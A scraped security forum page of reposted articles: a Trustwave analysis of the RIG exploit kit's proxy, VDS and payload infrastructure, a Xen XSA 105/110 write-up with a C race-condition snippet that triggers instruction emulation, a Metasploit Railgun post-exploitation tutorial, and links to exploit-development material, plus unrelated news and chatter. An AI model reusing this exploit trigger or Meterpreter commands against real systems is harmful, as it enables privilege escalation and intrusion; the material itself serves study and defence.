Nytro

Cica nu ar fi reparata complet.

RIG Exploit Kit – Diving Deeper into the Infrastructure February 23, 2015 Posted By SpiderLabs Research Following our previous blog post about the leaking of the RIG exploit kit's source code, we dug deeper into the architecture that facilitates the massive infections using RIG. The screen shot below diagrams RIG's infrastructure. RIG Exploit Kit Infrastructure Most commonly we see only the one end of this rabbit hole--the compromised site and the proxy server. Below we will detail what happens behind the scenes during the infection and explain how RIG customers use it to deploy their infection campaigns. We weren't kidding about digging deep, so grab a cup of coffee because you may be here a while. First thing first RIG's infrastructure might look complicated, but it's rather straightforward for the customer who simply wants to infect victims and generate revenue. So, we'll start with the basics. For the purposes of our analysis, we'll take the perspective of a RIG customer that already maintains a backdoor on a popular web site and now wants to monetize that traffic. First, the RIG customer needs a URL to which they can redirect the traffic to exploit victims' machines. RIG customer API - "api.php" RIG Customer API ("Get Link" button - generates customer's specific URL) In order to infect victims, the RIG customer has to choose a payload and upload it through the admin panel – but we won't focus on this. Once the RIG customer uploads the payload, it makes sense that the next step would be pointing victims to the infection page. However, in order to evade detection by web filters and URL lists, the landing page needs to update regularly. RIG provides an API for this purpose that creates new, valid infection URLs on demand. Clicking on the "Get Link" button in the interface pictured above will provide the API URL. The URL will be in the following format: hxxp://[RIG-Instance-Server]/api.php?apitoken=[API TOKEN] The "API TOKEN" at the end of the URL is a unique key that combines the user's ID with the current "Flow ID" (pictured in Figure 2 below), serializes the combination and encrypts it using RC4 with a private key configurable only by the main RIG administrator. Each RIG user can have up to 2 distinct flows, which allows for infections via different payloads for each flow. Code snippet that appends the API token The PROXY Layer The output of the URL above is the "PROXY" URL which functions as the "infection page". Here is an example of the structure of the "PROXY" URL: hxxp://[PROXY Server]/proxy.php?PHPSSESID=njrMNruDMlmbScafcaqfH7sWaBLPThnJkpDZw-4|OTMxOGYwMjdkZTMxOGFmN2M5OWZkMDNjODE0MmMyODM Every request to a PROXY URL (e.g., "index.php?PHPSSESID=…", "proxy.php?PHPSSESID=…", or more commonly just "hxxp://current-proxy-domain/?PHPSESSID=…") contains the token of a RIG customer for the specific campaign. Basically, all customers using the same RIG exploit kit server share the PROXY URL. Before we discuss the PROXY core, let's take a closer look at the URI generated by the "api.php". The URI is divided into 2 parts separated with the character "|". Here's the first part from our example: njrMNruDMlmbScafcaqfH7sWaBLPThnJkpDZw-4 This encrypted string is actually a URL for a different server that handles requests to load an exploit and send it back to the victim's machine. Let's take a look at how this URL is generated: Encrypted VDS URL code To decrypt this content we need to use RC4 with the key and then use the function "base64url_decode". Here is the result of the string above, which is the VDS server that we will examine later on: http://vdstomama[.]com/core.php The second part of the URL structure is less exciting. The objective is to make sure the URL becomes invalid after a certain period of time - which is configurable by the RIG exploit kit admin; the default is 720 seconds (12 minutes). This technique is very effective because after 12 minutes the URL doesn't serve the exploits and is useless to security researchers trying to analyze such URLs. Token generation code The screenshot above describes the generation process of the token, which is a combination of the time, the user ID and the user login name all together with MD5 and later on with base64url_encode. Now, let's get back to the place where the PROXY URLs are managed: Proxy list management Only the RIG exploit kit administrator can manage this list. RIG customers have no control over it. The admin can bulk-load domains or load them one-by-one. This list functions as a queue using the first item (topmost) until anti-virus tools begin detecting it or it is no longer online. On every RIG admin server, a scheduled task runs every 5 minutes to check the first active PROXY on the list: PHP code to check the domains to be used as proxy servers The domain is scanned by the "avdetect.com" service, and it is removed from the active list once it is detected as malicious. Additionally, if anti-virus vendors start to blacklist the PROXY server, then the RIG admin code will send the PROXY server a command to switch its assigned domain. Proxy domains blacklisting code The RIG administration server accesses the PROXY with a unique key along with the domain that should be removed. The domain is inserted into a blacklist file that is checked each time a victim is browsing the PROXY server. The VDS Layer – Providing the landing page and exploits VDS stands for Virtual Dedicated Server. VDS serves the role of an exploit generator. The main objective is to avoid detection by keeping those servers hidden from the world. According to records we've collected since August 2014, the RIG developers only used three different VDS servers. First stage – fetching the landing page: The first time the VDS is accessed results in the landing page content. The HTML/JS code itself is obfuscated using a function called CryptJS written by RIG's developers. PHP function obfuscates the malicious JS code After obfuscating the code, RIG's developers take extra caution by encrypting all of the data sent to the PROXY to avoid detection by IPS or anything monitoring the traffic. PHP code serving the landing page (+ notify the admin server) After sending the content back to the PROXY as depicted in the screenshot above, the VDS reports back to the RIG admin server about the exploit attempt. Second stage – fetching the exploits: The landing page will check if the browser supports Java, Flash or Silverlight. According to the results of the plug-in enumeration code, the victim's browser will request the respective exploits. The PROXY receives the request from the victim machine and delivers it to the VDS. In order to request the appropriate exploit, the victim's browser will issue another request with a new parameter named "req". For example, if the value is "swf", the VDS server will send back the Flash exploit. For example: hxxp://[redacted].ga/proxy.php?req=swf&num=8454&PHPSSESID=njrMNruDMlmbScafcaqfH7sWaBLPThnJkpDZw- 4|OTMxOGYwMjdkZTMxOGFmN2M5OWZkMDNjODE0MmMyODM However, unlike the plug-in exploits that are only served if applicable, the Internet Explorer exploit is served without any prerequisites, already in the first VDS response along with the initial landing page. Third stage – fetching the payload: After it's exploited, the victim machine requests the payload using the parameter "req" with the value "mp3". Payload serving code The VDS sends a request to the RIG admin server along with information about the victim machine and asks for the relevant payload that should be delivered. The payload is pulled from the RIG admin server and encrypted using an RC4 key (a different key from the previous one) to avoid anti-virus detection. Encrypted payload Since this key is less important, it is sent to the victim machine during the exploitation phase. The executable itself is decrypted on the victim machine, written to the file system and then executed. For example, if the successful exploit is CVE-2014-6332 then the decryption phase looks like this: Payload decryption (part of the exploits) RIG Administration Server The RIG developers planned the infrastructure as a layered structure: the RIG admin server is basically nothing but a control panel and does not proactively exploit victim machines. Therefore, the RIG admin server can function for a long period of time behind a service such as CloudFlare, unlike the proxies, which are replaced regularly. The admin server provides RIG customers with full control of their malware campaign and does not require any specialized knowledge of the back end. The RIG customer only needs to (1) figure out how to spread the infection URLs (typically by compromising web sites with large volumes of traffic, or malvertising) and (2) ensure the payload is stable. Payload management panel Just like its competition, the RIG exploit kit provides complete statistics of the campaign's achievements. Flow statistics The screenshot above displays the main statistics page of the exploit kit. The overall exploitation rate for this specific "flow" is 14.7%. You can notice that the overall exploitation is divided between Flash and Internat Explorer exploits. Specific CVEs include: CVE-0214-0311 in Flash; CVE-2013-2551 in versions 7, 8, and 9 of MSIE; and CVE-2014-6332 in Internet Explorer 10. Additional information reported includes countries targeted, browser versions and OS. The business model Here you'll see an advertisment for the RIG exploit kit on a Russian forum: RIG advertisement This advertisement is aimed at customers that want to distribute their malware (payload) using the RIG exploit kit. The criminals behind RIG also established a reselling model, whereby each reseller can have their own RIG admin panel from which their own customers will deploy infection campaigns. Thus far our research has shown at least two large resellers accounting for over 250 customers combined. We can only assume there are additional resellers. Nonetheless, in comparison to the main RIG admin panel, which provided services to about 360 customers, it becomes evident that the reselling model almost doubled their profit. The data we examined accounts for the period of time between August 2014 and February 2015. RIG reselling model Multiplying 600 customers by $150 (the price per week of use), we estimate that the RIG exploit kit could be generating up to $90,000 per week. This rough estimate doesn't take into account operational expenses or customers that pay with a portion of their infections (similar to the Magnitude exploit kit's model), but it still shows that exploit kits can result in a very nice profit for the developers. Trustwave customers using Trustwave SWG or Trustwave UTM are protected against RIG Exploit Kit without the need for any further updates. Sursa: https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/

The Dangers of x86 Emulation: Xen XSA 110 and 105 Posted by Felix Wilhelm Developing a secure and feature rich hypervisor is no easy task. Recently, the open source Xen hypervisor was affected by two interesting vulnerabilities involving its x86 emulation code: XSA 110 and XSA 105. Both bugs show that the attack surface of hypervisors is often larger than expected. XSA 105 was originally reported by Andrei Lutas from BitDefender. The patch adds missing privilege checks to the emulation routines of several critical system instructions including LGDT and LIDT. The vulnerable code can be reached from unprivileged user code running inside hardware virtual machine (HVM) guests and can be used to escalate guest privileges. XSA 110 was reported by Jan Beulich from SUSE and concerns insufficient checks when emulating long jumps, calls or returns. Readers interested in virtualization technology might wonder about the existence of an instruction emulator in the HVM hypervisor code: One of the advantages of hardware-assisted virtualization is the ability to execute privileged instructions natively and securely. While this is true in general, emulation is still needed for some special cases: Instructions accessing memory mapped IO space. VMs running in real mode: Due to restrictions of earlier Intel VMX versions many popular hypervisors emulate VM code running in real mode. Support instructions not yet implemented by the physical hardware. In practice, all mainstream hypervisors include at least basic emulation support with very varying quality. While memory flaws in the emulator code could allow for a complete hypervisor breakout, logic bugs involving wrongly emulated instructions are much more common. In the worst case, these bugs can result in privilege escalation vulnerabilities inside the guest VM, as it is the case for XSA 105. As mentioned in the advisory, the bug is caused by missing privilege checks for certain special instructions. In order to exploit this bug for privilege escalation, we require a way to emulate arbitrary instructions as a normal user inside a VM. Emulating Arbitrary Instructions Fortunately, emulation of arbitrary instructions can be triggered easily on guests with multiple virtual CPUs, as described by Andrej Lutas in his writeup: First, we raise an #UD exception on one the CPUs by executing an invalid opcode. This will trigger an VM exit, which is handled by the main vm exit handler. For Intel CPUs, this handler is the vmx_vmexit_handler function defined in x86/hvm/vmx/vmx.c: void vmx_vmexit_handler(struct cpu_user_regs *regs) { … switch ( exit_reason ) { … case TRAP_invalid_op: HVMTRACE_1D(TRAP, vector); vmx_vmexit_ud_intercept(regs); break; … } While the complete exit handler is quite complex, at its core is just a big switch statement based on the VMX exit reason. In the case of an #UD exception, the vmx_vmxeit_ud_intercept function is called: static void vmx_vmexit_ud_intercept(struct cpu_user_regs *regs){ struct hvm_emulate_ctxt ctxt; int rc; hvm_emulate_prepare(&ctxt, regs); rc = hvm_emulate_one(&ctxt); ... } As we can see, the function is a small wrapper around hvm_emulate_one, which in turn calls into the x86_emulate function defined in x86/x86_emulate/x86_emulate.c for the actual emulation. One interesting aspect for us is that x86_emulate fetches the actual bytes to be emulated directly from the guest memory. This means, that there exists a race condition from the time when the #UD exception is raised to the point when x86_emulate fetches the instruction bytes. If we use our second virtual CPU to manipulate the originally invalid opcode during this time span, we can force emulation of arbitrary assembly instructions. While winning this race reliably is quite hard, even a small chance to win is sufficient for our use case. The code snippet below shows a minimal sample that will trigger emulation of a far return using this technique: #include <stdlib.h> #include <pthread.h> #include <time.h> #include <stdio.h> #include <sys/mman.h> #include <unistd.h> // Initialize barrier with 0 long barrier=0; void *thread_one(void *x) { __asm volatile(".intel_syntax noprefix\n" ".code64\n" // Write UD2 instruction at position of ret "mov byte ptr [trigger], 0x0F\n" "mov byte ptr [trigger+1], 0x0B\n" // Increase barrier "lea rax, [barrier]\n" "lock inc qword ptr [rax]\n" "wait:\n" "cmp qword ptr [rax], 2\n" // Wait until thread_two arrives at barrier "jnz wait\n" "trigger:\n" // Will be replaced with UD2 by now "rex64 retf\n" ".att_syntax prefix\n" ); } void *thread_two(void *x) { __asm volatile(".intel_syntax noprefix\n" ".code64\n" "lea rax, [barrier]\n" "lock inc qword ptr [rax]\n" "wait2:\n" "cmp qword ptr [rax], 2\n" "jnz wait2\n" // Restore far ret instruction "mov byte ptr [trigger], 0x48\n" "mov byte ptr [trigger+1], 0xCB\n" ".att_syntax prefix\n" ); } void doStuff(void) { // Initialize and start both threads. pthread_t h1, h2; pthread_create(&h1,NULL,thread_one,NULL); pthread_create(&h2,NULL,thread_two,NULL); pthread_join(h1,0); pthread_join(h2,0); } int main(int argc, char **argv) { // We have to make the code of thread_one writable in order to enable // patching of the instruction. Simply mprotecting the whole page is the // easiest way to do this. long page_size = sysconf(_SC_PAGESIZE); long address = (long) thread_one; mprotect(((void *) (address & ~(page_size-1))), page_size, PROT_READ | PROT_WRITE | PROT_EXEC); doStuff(); return 0; } Of course without bugs in the emulator code this ability is not very interesting in itself. Besides classic low-level code issues like memory corruptions there are two features of an emulator that can be an interesting source of security vulnerabilities: Guest Memory Access: Most emulated instructions will access VM memory either directly or indirectly. During normal operation memory access checks are performed automatically by the hardware. However, when emulating all these checks have to be performed by the hypervisor itself. The low level nature of this code, as well as the high complexity of the x86 architecture makes this work quite error prone. Privileged Instructions: Several x86 instructions should only be called from ring 0. This includes instructions that manipulate control or system registers, instructions that influence segment selector or even simple ones like “HLT” which halts the CPU. Xen XSA 105 Xen XSA 105 is a quite simple example of the second bug type. When looking at the implementation of the wrmsr instruction inside the Xen emulator, we can see that the instruction will be only be evaluated when the caller is in ring 0: case 0x30: /* wrmsr */ { uint64_t val = ((uint64_t)_regs.edx << 32) | (uint32_t)_regs.eax; [B]generate_exception_if(!mode_ring0(), EXC_GP, 0);[/B] fail_if(ops->write_msr == NULL); if ( (rc = ops->write_msr((uint32_t)_regs.ecx, val, ctxt)) != 0 ) goto done; break; } However, this check is missing for several other functions including HLT, LIDT and LGDT. case 0xf4: /* hlt */ ctxt->retire.flags.hlt = 1; break; … case 2: /* lgdt */ case 3: /* lidt */ generate_exception_if(ea.type != OP_MEM, EXC_UD, -1); fail_if(ops->write_segment == NULL); memset(®, 0, sizeof(reg)); if ( (rc = read_ulong(ea.mem.seg, ea.mem.off+0, &limit, 2, ctxt, ops)) || (rc = read_ulong(ea.mem.seg, ea.mem.off+2, &base, mode_64bit() ? 8 : 4, ctxt, ops)) ) goto done; reg.base = base; reg.limit = limit; if ( op_bytes == 2 ) reg.base &= 0xffffff; if ( (rc = ops->write_segment((modrm_reg & 1) ? x86_seg_idtr : x86_seg_gdtr, ®, ctxt)) ) goto done; break; Because LIDT allows the overwriting of the Interrupt Descriptor Table which stores the handler of all hardware and software interrupts, privilege escalation is easily possible. The already mentioned whitepaper describes the exploitation process on Windows in detail. The patch for XSA 105 is as simple as the bug. Just add ring 0 checks in front of all privileged instructions. Xen XSA 110 The second recent bug involving the Xen emulator is Xen XSA 110, which was discovered by Jan Beulich from SUSE. X86 supports far branch instructions that support jumping to a new address while simultaneously changing the code segment selector to a new value. In order to understand the underlying details of this vulnerability, a bit of background about the role of segment selectors on modern operating systems is needed: When we are talking about ring 0 or ring 3 mode, we are actually talking about the “Current Privilege Level” (CPL) of the currently executing code. The CPL is encoded in the lowest bits of the CS segment selector and cannot be changed by normal means. Direct access to the CS register is impossible and instructions that change the value of the CS register take care to ensure that a switch to ring 0 is only possible under special predefined circumstances. Besides being used for enabling and disabling access to privileged instructions, the CPL is used whenever memory is accessed. The “Descriptor Privilege Level” (DPL) of a memory segment that is encoded in the segment descriptor restricts access to code that executes with a CPL smaller or equal to DPL. The issue patched with XSA 110 is the fact that the actual checks performed by the Xen emulator when changing the value of the CS register are much weaker than they should be. The following code is part of the vulnerable function protmode_load_seg defined in x86/x86_emulate/x86_emulate.c: dpl = (desc.b >> 13) & 3; rpl = sel & 3; cpl = ss.attr.fields.dpl; switch ( seg ) { case x86_seg_cs: /* Code segment? */ if ( !(desc.b & (1u<<11)) ) goto raise_exn; /* Non-conforming segment: check DPL against RPL. */ if ( ((desc.b & (6u<<9)) != (6u<<9)) && (dpl != rpl) ) goto raise_exn; break; protmode_load_seg is indirectly called by the emulation routines of all far branching instructions (RETF, CALL and JMP). Its purpose is to change the value of a segment selector register after validating the new value. However, in the unpatched version no sufficient checking is performed. An attacker wanting to escalate privileges on a Linux system would choose the CS register value 0x10, which corresponds to the CS value used by the Linux kernel. In this case the variables rpl and dpl in Listing 6 would be 0, while the current CPL would still be 3. But because the switch for the code segment does not check the current CPL in any way, the instruction would be emulated. While we originally thought this bug would be sufficient for privilege escalation, this does not seem to be the case due to an interesting and lesser-known property of the Intel x86 architecture. While the current CPL is always stored in the lowest bits of the CS selector, there is a hard requirement that the same value is also stored in the DPL field of the stack segment. Because this requirement is not actually handled by the emulator code, an exploit targeting this vulnerability will result in a crash of the virtual machine. A normal user should not be able to trigger this behavior, but it is a significantly less interesting bug. Summary Xen XSA 105 and XSA 110 are two bugs involving the Xen x86 emulation code. They both can be used to crash a virtual machine as an unprivileged user and XSA 105 even allows privilege escalation independent of vulnerabilities in the virtualized operating system. Bugs like this show that hypervisors are often not as hardened as many people assume and the introduction of additional software layers will lead to additional bugs. Full exploit code for Xen XSA 105 will be presented during the Exploiting Hypervisors Workshop at Troopers 15 and will be released publicly sometimes after that. Sursa: http://www.insinuator.net/2015/02/the-dangers-of-x86-emulation-xen-xsa-110-and-105/

Da, vreau si eu un SSD produs inainte de 2006

Shit just got serious.

OFFENSIVE SECURITY LECTURES - 12: EXPLOIT DEVELOPMENT 103 Description: Third lecture in the exploit development lecture series. Coverage of heap and format string exploition (with demos), as well as exploit mitigations (ASLR, NX/DEP, stack cookies, EMET, etc...) PDF:- https://docs.google.com/presentation/d/1jG-doOVFTg2ayamQ7E5tlfSw3HLb6VOARUu48TTMpHo/edit?usp=sharing Reading: Read 0x680 up to 0x6A0 in HAOE Via: http://www.securitytube.net/video/12450

WinObjEx64 Windows Object Explorer 64-bit WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 let you view and edit object-related security information if you have required access rights. System Requirements WinObjEx64 does not require administrative privileges. However administrative privilege is required to view much of the namespace and to edit object-related security information. WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP, Windows Vista is partially supported. We have no plans of their full support. In order to use all program features Windows must be booted in the DEBUG mode. Build WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions. Authors © 2015 WinObjEx64 Project Original WinObjEx © 2003 - 2005 Four-F Sursa: https://github.com/hfiref0x/WinObjEx64

Linus Torvalds Releases Linux Kernel 4.0 RC1, Final Version Will Bring Live Patching The 3.x branch of the Linux kernel has been dropped After letting users decide the version numbering of the Linux kernel software, as Softpedia reported two weeks ago based on the Linus Torvalds’ Google+ poll for Linux kernel 3.20/4.0, the time has come for a change, as Linus Torvalds was proud to announce today the immediate availability for testing of the first RC (Release Candidate) version of the forthcoming Linux 4.0 kernel. This RC1 version is the first development release of what will become Linux kernel 4.0 in approximately 3-4 months. The final version of Linux kernel 4.0 will most probably arrive until summer 2015, when every kernel maintainer will go on vacation. However, Linus Torvalds tries to assure people that a version number change won’t bring any major features or break compatibility with previous releases. “Because the people have spoken, and while most of it was complete gibberish, numbers don't lie. People preferred 4.0, and 4.0 it shall be. Unless somebody can come up with a good argument against it. On the other hand, the strongest argument for some people advocating 4.0 seems to have been a wish to see 4.1.15 - because ‘that was the version of Linux skynet used for the T-800 terminator,’” says Linus Torvalds in the mailing list announcement. Live patching will be implemente d in the final release of Linux kernel 4.0 Without further ado, you can download the Linux kernel 4.0 RC1 right now via Softpedia or directly from the kernel.org website, whichever suits you best. We remind you that it’s an unstable version that should not be installed on production machines. According to Linus Torvalds’ notes, it is a fairly small release, but not much smaller than the usual RC versions. Prominent features include various vm cleanups, and the unification of the PROTNONE and NUMA handling for page tables. The final release of Linux kernel 4.0 will also include the highly anticipated live patching infrastructure. By Marius Nestor Sursa: Linus Torvalds Releases Linux Kernel 4.0 RC1, Final Version Will Bring Live Patching - Softpedia

Senior PHP & MySQL Developer Knowledge and Skills • Medium/Advanced knowledge of PHP & MySQL; • Medium/Advanced knowledge of XHTML, CSS, JS, XML, CSS & HTML, AJAX; • Medium/Advanced knowledge of OOP programming; • Capacity to understand and adapt quickly to the working model of some complex and mature applications; • Experience in developing web applications; • Ability to create a flexible design and capacity to write a well-structured code; • Talented and fast learner; • Reliable, loyal, motivated and ambitious, ready for long term collaboration; Responsibilities •You will develop and expand our product platform, along with your colleagues; •You will work on long-term running projects for our clients; The following represent an advantage • University education in Computer Science, Informatics, Engineering, Cybernetics; • Experience with SVN versioning system; • Knowledge of the required methods of working with Smarty; • Be thorough, have good attention to detail and display a high level of accuracy; • Strong analytical, creative thinking; Job benefits • Open minded team of highly skilled colleagues • Modern environment, office building, downtown location • Attractive financial and benefits package • Relaxation at dcs plus lounge together with colleagues and friends – bar, cinema, chill out area, billiards, ping-pong, darts, food court • Other benefits: fruits and coffee on the house, medical insurance, teambuildings Detalii la @Cheater

(Inca) Nu stiu Python, dar intra din browser pe: "site . com /interface/ipsconnect/ipsconnect.php ?" si vezi ce raspuns primesti.

Depinde ce servicii ai activate: - comision de administrare ~ 3-4 RON - Internet banking ~ 3-4 RON - alerte SMS ~ 3-4 RON

[TABLE] [TR] [TD]Hyperion-1.2.zip[/TD] [TD] [/TD] [/TR] [TR] [TD=width: 130]Description:[/TD] [TD] Hyperion is a runtime encrypter for 32-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter". [/TD] [/TR] [TR] [TD]MD5:[/TD] [TD]dc31d022b124dc92e7c362a62e64bd46[/TD] [/TR] [TR] [TD]Author:[/TD] [TD]belial[/TD] [/TR] [/TABLE] Sursa: nullsecurity

exrs Exercises for learning Reverse Engineering and Exploitation. All binaries for these challenges are ELF 64-bit LSB executable, x86-64. reverse engineering The goal is to run the chalenges like this ./rX password and having them print out password OK. It's reverse engineering, not cracking. So don't patch the binnaries if you want to play by the rules. It gets really borring if you don't anyway. sploit All the sploit exercices are designed to be solvable with NX+ASLR without being dependant on which libc is used. The idea is you should only interact with stdin / stdout as if it was a remote service, argv & env is not needed for exploitation. The goal is of course to spawn a shell on each one. All of them are tested. Of course you can still do whatever you like, have fun! Link: https://github.com/wapiflapi/exrs

Accessing the Windows API Directly February 19, 2015 Accessing the Windows API Directly If you are into pentesting I am sure you might have heard about the IRB shell in the Metasploit framework. This will be a small post about accessing Windows API using Railgun. Using Railgun we can access different functions in DLLs during runtime in memory. We could also write our own DLLs and call them directly using Railgun. This technique is used in the Meterpreter scripts and post exploitation modules to access the API to perform automated tasks. For demonstration I will be using a Windows 7 machine as the target and Kali as the attacker machine. After owning the box in the meterpreter session type “irb” and from there we can start the interactive ruby shell. The “client” will be our meterpreter client. We can access common API calls like this. Suppose I want to get the system information. [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]client.sys.config.sysinfo [/TD] [/TR] [/TABLE] Get the user ID [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]client.sys.config.getuid [/TD] [/TR] [/TABLE] Get all network interfaces. To verify the return type of the object type .class at the end. In this case it’s an array. [TABLE] [TR] [TD=class: gutter]1 2 [/TD] [TD=class: code]init = client.net.config.interfaces init.each { |x| puts x.pretty } [/TD] [/TR] [/TABLE] The above are built-in calls. Using Railgun we can access the Windows API directly. The syntax would be. Client.railgun.(DLL).(function)(arg 1, arg 2, …) I will demonstrate some examples. So suppose I want to access the MessageBox function in the Windows API. It’s located in the “user32” DLL. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]int WINAPI MessageBox ( _In_opt_ HWND hWnd, _In_opt_ LPCTSTR lpText, _In_opt_ LPCTSTR lpCaption, _In_ UINT uType ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx To call the function we can type: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]?> client.railgun.user32.MessageBoxA(0, "Hello World", "Osanda", "MB_ICONASTERISK | MB_OK" ) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>1} [/TD] [/TR] [/TABLE] If you want to lock the workstation you could use “LockWorkStation” API. BOOL WINAPI LockWorkStation(void); https://msdn.microsoft.com/en-us/library/windows/desktop/aa376875%28v=vs.85%29.aspx [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]?> client.railgun.user32.LockWorkStation() => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true} [/TD] [/TR] [/TABLE] Suppose I want to terminate a process. For that I will be using the “OpenProcess” and “TerminateProcess” functions. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]HANDLE WINAPI OpenProcess( _In_ DWORD dwDesiredAccess, _In_ BOOL bInheritHandle, _In_ DWORD dwProcessId ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/ms684320%28v=vs.85%29.aspx [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]BOOL WINAPI TerminateProcess( _In_ HANDLE hProcess, _In_ UINT uExitCode ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/ms686714%28v=vs.85%29.aspx If I want to terminate the CMD running in the target machine. I’ll first get the handle to “PROCESS_TERMINATE” and store the return value in a variable and next call “TerminateProcess” API to terminate the process. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7[/TD] [TD=class: code]?> client.railgun.kernel32.OpenProcess("PROCESS_TERMINATE", false, 3664) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>4692} >> phandle = _['return'] => 4692 >> client.railgun.kernel32.TerminateProcess(phandle, 0) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true} >> [/TD] [/TR] [/TABLE] Likewise you could do cool stuff by directly accessing the API during runtime. Read the prototype of the function and apply accordingly using Railgun. If you want to find the functions loaded to Railgun in a specific DLL just get the exception error message and you will see the functions loaded. Now let’s try to add a new DLL which is not shipped by default into Railgun. To check the available DLL type. [TABLE] [TR] [TD=class: gutter]1 2 3[/TD] [TD=class: code]?> client.railgun.known_dll_names => ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32", "shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"] >> [/TD] [/TR] [/TABLE] Let’s try to add “mpr.dll” into Railgun at runtime and try to access a function. This would be the syntax. client.railgun.add_dll(Name, Path) To add “mpr.dll” we can enter like this: client.railgun.add_dll("mpr", "C:/windows/system32/mpr.dll") After that you should add the function. To view the functions of a DLL I will be using DLL Export Viewer by Nirsoft, feel free to use any utility you like. I would like to use the “WNetGetUserW” function. Let’s check the function from MSDN. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]DWORD WNetGetUser( _In_ LPCTSTR lpName, _Out_ LPTSTR lpUserName, _Inout_ LPDWORD lpnLength ); [/TD] [/TR] [/TABLE] https://msdn.microsoft.com/en-us/library/windows/desktop/aa385476%28v=vs.85%29.aspx We should follow the syntax of the Railgun. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]client.railgun.add_function("mpr", "WNetGetUserW", "DWORD", [ ["PWCHAR", "lpName", "in"], ["PWCHAR", "lpUserName", "out"], ["PDWORD", "lpnLength", "inout"] ]) [/TD] [/TR] [/TABLE] After adding the function we can run the function passing the arguments [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]>> client.railgun.mpr.WNetGetUserW(nil,50,50) => {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>0, "username"=>"SYSTEM\x00AAAAAAAAAAAAAAAAAA", "lplen"=>50} [/TD] [/TR] [/TABLE] That is how you can access the Windows API using Railgun. For more info about editing modules read their documentation https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Railgun-for-Windows-post-exploitation MSDN is your friend. To play around with different APIs apply according to information provided by MSDN. Thanks for reading. Posted by Osanda Malith in pentesting Sursa: https://osandamalith.wordpress.com/2015/02/19/accessing-the-windows-api-directly/

[h=1]SystemProgramming[/h] Welcome to Angrave's crowd-sourced System Programming wiki! This wiki is being built by students and faculty from UIUC. Rather than requiring a book this semester, we will build our own set of resources here. [h=2]Week 1[/h] C Programming, Part 1: Introduction C Programming, Part 2: Text Input And Output Informal Glossary of basic terms #Piazza: When And How to Ask For Help [h=2]Week 2[/h] C Programming, Part 3: Common Gotchas Forking, Part 1: Introduction Forking, Part 2: Fork, Exec, Wait Kill [h=2]Week 3[/h] Memory, Part 1: Heap Memory Introduction Memory, Part 2: Implementing a Memory Allocator Memory, Part 3: Smashing the Stack Example Pthreads, Part 1: Introduction [h=2]Week 4[/h] Pthreads, Part 2: Usage in Practice Synchronization, Part 1: Mutex Locks Synchronization, Part 2: Counting Semaphores [h=2]Week 5[/h] Synchronization, Part 3: Working with Mutexes And Semaphores Synchronization, Part 4: The Critical Section Problem Synchronization, Part 5: Condition Variables [h=2]Week 6[/h] Synchronization, Part 6: Implementing a barrier Synchronization, Part 7: The Reader Writer Problem Synchronization, Part 8: Ring Buffer Example Synchronization, Part 9: The Reader Writer Problem (part 2) [h=2]Week 7[/h] Deadlock, Part 1: Resource Allocation Graph Deadlock, Part 2: Deadlock Conditions [h=2]Week 8[/h] Todo Analysis of Dining Philosophers (for now see the discussion section handout) ** Breaking Circular Wait. Using a global mutex to break hold-and-wait ** Beware of starvation if all philosophers hold their left chopstick and try+release their right chopstick Virtual Memory, Part 1: Introduction to Virtual Memory Pipes, Part 1: Introduction to pipes Pipes, Part 2: Pipe programming secrets Files, Part 1: Working with files [h=2]Week 9[/h] POSIX, Part 1: Error handling Networking, Part 1: Introduction Networking, Part 2: Using getaddrinfo Networking, Part 3: Building a simple TCP Client Programming Tricks, Part 1 [h=2]Week 10[/h] Networking, Part 4: Building a simple TCP Server Networking, Part 5: Reusing ports Scheduling, Part 1: Scheduling Processes [h=2]Week 11[/h] File System, Part 1: Introduction File System, Part 2: Files are inodes (everything else is just data...) File System, Part 3: Permissions [h=2]Week 12[/h] File System, Part 4: Working with directories File System, Part 5: Virtual file systems File System, Part 6: Memory mapped files and Shared memory File System, Part 7: Scalable and Reliable Filesystems Networking, Part 6: Creating a UDP server [h=2]Week 13[/h] Signals, Part 2: Pending Signals and Signal Masks Signals, Part 3: Raising signals Signals, Part 4: Sigaction [h=2]Week 14[/h] File System, Part 8: Disk blocks example [h=2]Other content[/h] C Programming, Part 4: Debugging #Example Markdown Legal and Licensing information: Unless otherwise specified, submitted content to the wiki must be original work (including text, java code, and media) and you provide this material under a Creative Commons License. If you are not the copyright holder, please give proper attribution and credit to existing content and ensure that you have license to include the materials. Sursa: https://github.com/angrave/SystemProgramming/wiki

Cititi ce e scris cu rosu.

